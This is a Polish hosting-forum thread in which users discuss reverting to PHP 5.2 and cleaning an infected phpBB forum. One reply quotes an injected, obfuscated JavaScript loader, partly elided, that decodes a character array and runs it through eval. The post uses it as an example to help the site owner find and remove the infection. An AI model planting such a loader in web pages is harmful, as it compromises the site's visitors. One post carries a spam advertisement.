Witam
czy da sie przywrócić aktualizacje 5.2 do PHP ? i w jaki sposób?
PHP
Re: PHP
Pomijając że PHP 5.2 zjadało 2 razy więcej pamięci niż PHP 5.4, było o X razy mniej wydajne, zawieszało serwer (!)
to zwyczajnie nie ma już czegoś takiego jak 'PHP 5.2' ponieważ jego rozwijanie i wsparcie zakończyło się w roku 2010.
Względnie uaktualnić swój skrypt do nowszej wersji.
to zwyczajnie nie ma już czegoś takiego jak 'PHP 5.2' ponieważ jego rozwijanie i wsparcie zakończyło się w roku 2010.
Użyć ...maszyny czasu ?Kubara pisze:czy da sie przywrócić aktualizacje 5.2 do PHP ? i w jaki sposób?
Względnie uaktualnić swój skrypt do nowszej wersji.{$signature}
-
Piotr GRD
- Posty: 1296
- Rejestracja: 25 sty 2010, 11:17:07
- Lokalizacja: Szczecin
- Płeć:
- User Agent:
- Kontakt:
Re: PHP
Jeśli bardzo chcesz korzystać z PHP w wersji 5.2, to na serwerze CBA jest wciąż zainstalowane. Wystarczy w folderze głównym swojego konta (lub w folderze subdomeny, jeśli jej ma zmiana dotyczyć) umieścić pusty plik o nazwie ".php52" (kropka na początku nazwy).
Pamiętaj jednak, że wersja ta jest uznawana już za przestarzałą, administracja CBA odradza jej używanie, była już próba całkowitego wyłączenia wersji 5.2 - nieudana, zbyt wiele osób ma tutaj wciąż starsze skrypty (pisane pewnie pod 5.1 lub dużo wcześniejsze wersje), które generowały błędy po przełączeniu wszystkich na 5.3 - ale można spodziewać się, że prędzej czy później wersja ta mimo wszystko zniknie z serwera.
Pamiętaj jednak, że wersja ta jest uznawana już za przestarzałą, administracja CBA odradza jej używanie, była już próba całkowitego wyłączenia wersji 5.2 - nieudana, zbyt wiele osób ma tutaj wciąż starsze skrypty (pisane pewnie pod 5.1 lub dużo wcześniejsze wersje), które generowały błędy po przełączeniu wszystkich na 5.3 - ale można spodziewać się, że prędzej czy później wersja ta mimo wszystko zniknie z serwera.
Monitor serwera CBA.pl (zapisz lub dodaj do ulubionych, żeby nie zapomnieć)
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
-
Piotr GRD
- Posty: 1296
- Rejestracja: 25 sty 2010, 11:17:07
- Lokalizacja: Szczecin
- Płeć:
- User Agent:
- Kontakt:
Re: PHP
Jeśli sprawa dotyczy strony wspomnianej tutaj:
http://www.cba.pl/forum/viewtopic.php?p=139544#p139544
To na chwilę obecną - co już zdążyłem napisać w odpowiedzi na prywatną wiadomość - niewłaściwie podana jest nazwa hosta MySQL, a ponadto skądś się tam wziął podejrzany javascript, który należałoby zlokalizować, usunąć, a potem zmienić hasła itd.
http://www.cba.pl/forum/viewtopic.php?p=139544#p139544
To na chwilę obecną - co już zdążyłem napisać w odpowiedzi na prywatną wiadomość - niewłaściwie podana jest nazwa hosta MySQL, a ponadto skądś się tam wziął podejrzany javascript, który należałoby zlokalizować, usunąć, a potem zmienić hasła itd.
Monitor serwera CBA.pl (zapisz lub dodaj do ulubionych, żeby nie zapomnieć)
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
-
Piotr GRD
- Posty: 1296
- Rejestracja: 25 sty 2010, 11:17:07
- Lokalizacja: Szczecin
- Płeć:
- User Agent:
- Kontakt:
Re: PHP
<< 31 sty 2014, 08:16:09 >>
Jak to jak... Odnaleźć ten fragment w plikach.
Przecież wyraźnie na pierwszy rzut oka najbardziej podejrzanymi fragmentami są dwa ciągi wyglądające mniej więcej:
Najłatwiej byłoby przywrócić czystą kopię wszystkiego. Pozostaje pytanie - czy takową posiadasz.
Jeśli nie, to mi najłatwiej zawsze było odnaleźć zmodyfikowane pliki sortując je w kliencie FTP po dacie modyfikacji - tu jednak przeszkodę możesz napotkać w sytuacji, jeśli niedawno wszystko usunąłeś i przywróciłeś już zainfekowaną kopię. Jeśli jednak instalowałeś czyste pliki, a dopiero później zostały one przez kogoś/coś zmodyfikowane, to powinieneś dojrzeć wyraźną różnicę w dacie modyfikacji plików.
Poza tym zawsze można po prostu uruchomić wyszukiwanie określonej frazy we wszystkich plikach (najłatwiej będzie lokalnie na komputerze w kopii wszystkich plików). Choć może się okazać, że w plikach PHP kod wygląda zupełnie inaczej, jest dodatkowo zaszyfrowany i wykorzystuje funkcje eval(), base64 itp. - ale z reguły są to rzucające się w oczy fragmenty kodu dla osoby choć trochę programującej w PHP.
Najczęściej (choć nie tylko!) infekowane bywają pliki o nazwach index/main/home.php/.html, takie weź na pierwszy ogień. Poza tym należy zwrócić uwagę, czy nie istnieją dodatkowe pliki, których oryginalnie być nie powinno.
Aby wyeliminować ponowne występowanie problemów, pozostaje pytanie: jak doszło do infekcji. Częstym przypadkiem jest infekcja komputera webmastera (keyloggery itp.) i zdobycie hasła FTP. Prawdopodobne jest też wykorzystanie luki w używanym skrypcie, szczególnie jeśli używasz jakiś dodatków, modyfikacji itp. z niezbyt pewnych źródeł (czyste phpBB by Przemo mam stojące od lat i nic się w moim przypadku nie dzieje, zmodyfikowane mam jedynie zabezpieczenie przed rejestracją botów). Z całą pewnością należy przeskanować własny komputer, pozmieniać hasła FTP itp.
<< 31 sty 2014, 19:34:59 >>
Niestety słowa: "(...) zainstalowałem skrypt od nowa, (wszystko usuwając) zainstalowałem na nowo (...)" - nie okazały się być zgodne z prawdą. Zdecydowana większość plików *.php/*.html/*.tpl/*.js zainfekowana już w październiku 2012, zawierają dodany automatycznie przez jakiegoś bota wspomniany przeze mnie wyżej złośliwy javascript. Nie pozostaje nic innego jak faktycznie wszystko wyczyścić i zainstalować od zera z dostępnych w sieci paczek instalacyjnych.
Można jedynie pokusić się o skopiowanie obrazków - awatarów, zdjęć, podpisów wgranych przez użytkowników - dostępnych w folderach /images/avatars/, /images/photos/, /images/signatures/, te pliki zdają się być czyste (ale tylko obrazki, wszelki indeksy itp. w tych folderach też są zainfekowane).
No i oczywiście baza danych, tę też jak najbardziej zachować i później po zainstalowaniu czystych plików przywrócić.
edycja:
Cytat: "tak pisałem, ze usunąłem wszystko, ale to nie ta strona
"
W takim razie przepraszam, nie byłem świadom problemów z dwoma stronami, sądziłem, że wszystko dotyczy jednej.
Jak to jak... Odnaleźć ten fragment w plikach.
Przecież wyraźnie na pierwszy rzut oka najbardziej podejrzanymi fragmentami są dwa ciągi wyglądające mniej więcej:
Kod: Zaznacz cały
<script type="text/javascript" language="javascript" >
if(020===0x10)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){w=window;e=w["e".concat(v)];}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,
(...)
,39,59);}w=f;s=[];r=String;for(i=0;-i+442!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+j%3));}if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");}</script>Jeśli nie, to mi najłatwiej zawsze było odnaleźć zmodyfikowane pliki sortując je w kliencie FTP po dacie modyfikacji - tu jednak przeszkodę możesz napotkać w sytuacji, jeśli niedawno wszystko usunąłeś i przywróciłeś już zainfekowaną kopię. Jeśli jednak instalowałeś czyste pliki, a dopiero później zostały one przez kogoś/coś zmodyfikowane, to powinieneś dojrzeć wyraźną różnicę w dacie modyfikacji plików.
Poza tym zawsze można po prostu uruchomić wyszukiwanie określonej frazy we wszystkich plikach (najłatwiej będzie lokalnie na komputerze w kopii wszystkich plików). Choć może się okazać, że w plikach PHP kod wygląda zupełnie inaczej, jest dodatkowo zaszyfrowany i wykorzystuje funkcje eval(), base64 itp. - ale z reguły są to rzucające się w oczy fragmenty kodu dla osoby choć trochę programującej w PHP.
Najczęściej (choć nie tylko!) infekowane bywają pliki o nazwach index/main/home.php/.html, takie weź na pierwszy ogień. Poza tym należy zwrócić uwagę, czy nie istnieją dodatkowe pliki, których oryginalnie być nie powinno.
Aby wyeliminować ponowne występowanie problemów, pozostaje pytanie: jak doszło do infekcji. Częstym przypadkiem jest infekcja komputera webmastera (keyloggery itp.) i zdobycie hasła FTP. Prawdopodobne jest też wykorzystanie luki w używanym skrypcie, szczególnie jeśli używasz jakiś dodatków, modyfikacji itp. z niezbyt pewnych źródeł (czyste phpBB by Przemo mam stojące od lat i nic się w moim przypadku nie dzieje, zmodyfikowane mam jedynie zabezpieczenie przed rejestracją botów). Z całą pewnością należy przeskanować własny komputer, pozmieniać hasła FTP itp.
<< 31 sty 2014, 19:34:59 >>
Niestety słowa: "(...) zainstalowałem skrypt od nowa, (wszystko usuwając) zainstalowałem na nowo (...)" - nie okazały się być zgodne z prawdą. Zdecydowana większość plików *.php/*.html/*.tpl/*.js zainfekowana już w październiku 2012, zawierają dodany automatycznie przez jakiegoś bota wspomniany przeze mnie wyżej złośliwy javascript. Nie pozostaje nic innego jak faktycznie wszystko wyczyścić i zainstalować od zera z dostępnych w sieci paczek instalacyjnych.
Można jedynie pokusić się o skopiowanie obrazków - awatarów, zdjęć, podpisów wgranych przez użytkowników - dostępnych w folderach /images/avatars/, /images/photos/, /images/signatures/, te pliki zdają się być czyste (ale tylko obrazki, wszelki indeksy itp. w tych folderach też są zainfekowane).
No i oczywiście baza danych, tę też jak najbardziej zachować i później po zainstalowaniu czystych plików przywrócić.
edycja:
Cytat: "tak pisałem, ze usunąłem wszystko, ale to nie ta strona
"W takim razie przepraszam, nie byłem świadom problemów z dwoma stronami, sądziłem, że wszystko dotyczy jednej.
Monitor serwera CBA.pl (zapisz lub dodaj do ulubionych, żeby nie zapomnieć)
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
------------
Kilka starych, aczkolwiek ciekawych, zdaniem niektórych, zdjęć: http://grd.art.pl/
Jezioro Szmaragdowe w Szczecinie
-
vademecum
- Posty: 40
- Rejestracja: 18 sty 2014, 17:26:26
- Strona na CBA.pl: localhost :]
- Płeć:
- User Agent:
Re: PHP
Kubara , najpierw EKSportuj starą bazę danych a po wgraniu skryptu importuj baze. Wszystkie tematy itp zostaną.
Programuję w PHP.
Tworzę strony www.
Zainteresowanych proszę o kontakt na PW.
Tworzę strony www.
Zainteresowanych proszę o kontakt na PW.
-
DeaDriam
- Posty: 4023
- Rejestracja: 04 lip 2011, 14:00:40
- Lokalizacja: Möglingen
- Płeć:
- User Agent:
- Kontakt:
Re: PHP
Kubara pisze: i jak importuje aktualna baze danych, wgram nowy skrypt phpbb, nastepnie wrzuce wcześniej skopiowana baze danych, działy, tematy, wpisy, zostanie ?
Zadajesz dziwne pytania na temat phpbb ,przeciez wszystko masz na wiki i na ich forum
Od a do zet tutoriale,od tego powinienes zaczac
Mozna tak
Majac kopie bazy i pliki instalujesz sobie phpbb
*wchodzisz do phpadmina i usuwasz baze **zaznacz wszystko i usun**
*potem exportujesz do niej kopie bazy ktora posiadasz
*Logujesz sie do pa forum i czyscisz cache i odswiezasz wszystko
**nastepnie o ile zachodzi potrzeba
wysylasz na serwer brakujace pliki np donosnie zalacznikow
i to samo czyscisz cache forum
Czyszczenie powoduje ze widac to co powinno byc widoczne
Rozumiesz? nie jak powyzej ktos tam pisze po wgraniu import,bo to bzdura,nie da rady importowac bazy do istniejacej bazy
_____________________________________________________
Nie badz pijawka-znalazles rozwiazanie problemu..podziel sie na forum!
----------------------------------------------------------------------------
SmacznY WordpresS>> http://www.przepisyzgarnka.pl <<
Nie badz pijawka-znalazles rozwiazanie problemu..podziel sie na forum!
----------------------------------------------------------------------------
SmacznY WordpresS>> http://www.przepisyzgarnka.pl <<
Re: PHP
O dzięki szukałem takich informacji właśnie
____________________
Myślę, że znalazłeś/aś lotnisko modlin parkingi - ORANGE PARKING Sprawdź czym prędzej, bo promocji nastał czas.
____________________
Myślę, że znalazłeś/aś lotnisko modlin parkingi - ORANGE PARKING Sprawdź czym prędzej, bo promocji nastał czas.
Ostatnio zmieniony 24 mar 2014, 10:08:07 przez Adela98, łącznie zmieniany 1 raz.
Re: PHP
skopiowałem baze danych na komputer zainstalowałem czyste pliki do FTP, po wgraniu bazy danych mamy komunikat
Critical Error!
message_die() was called multiple times.
Please, contact the Administrator. Thank you.
( na razie wgrałem na inna strone, w celu sprawdzenia )
wyżej kombinacja została zrobiona na ugu natomiast importowanie bazy na cba.pl wychodzi taki błąd:
wiec co trzeba zrobić aby uniknąć tych błędów ?
Critical Error!
message_die() was called multiple times.
Please, contact the Administrator. Thank you.
( na razie wgrałem na inna strone, w celu sprawdzenia )
wyżej kombinacja została zrobiona na ugu natomiast importowanie bazy na cba.pl wychodzi taki błąd:
Kod: Zaznacz cały
Couldn't access list of Forums
DEBUG MODE
SQL Error : 1054 Unknown column 't.topic_accept' in 'field list'
SELECT f.*, p.post_time, p.post_username, p.post_approve, u.username, u.user_id, u.user_level, u.user_jr, t.topic_last_post_id, t.topic_title, t.topic_poster, t.topic_accept FROM phpbb_forums f LEFT JOIN phpbb_posts p ON (p.post_id = f.forum_last_post_id) LEFT JOIN phpbb_users u ON (u.user_id = p.poster_id) LEFT JOIN phpbb_topics t ON (t.topic_last_post_id = p.post_id AND t.forum_id = f.forum_id) ORDER BY f.forum_order, f.forum_id
Line : 315
File : functions.php
Jeśli nie potrafisz znaleźć rozwiązania tego problemu,
możesz spróbować poszukać, lub zadać pytanie na forum: http://www.przemo.org/phpBB2/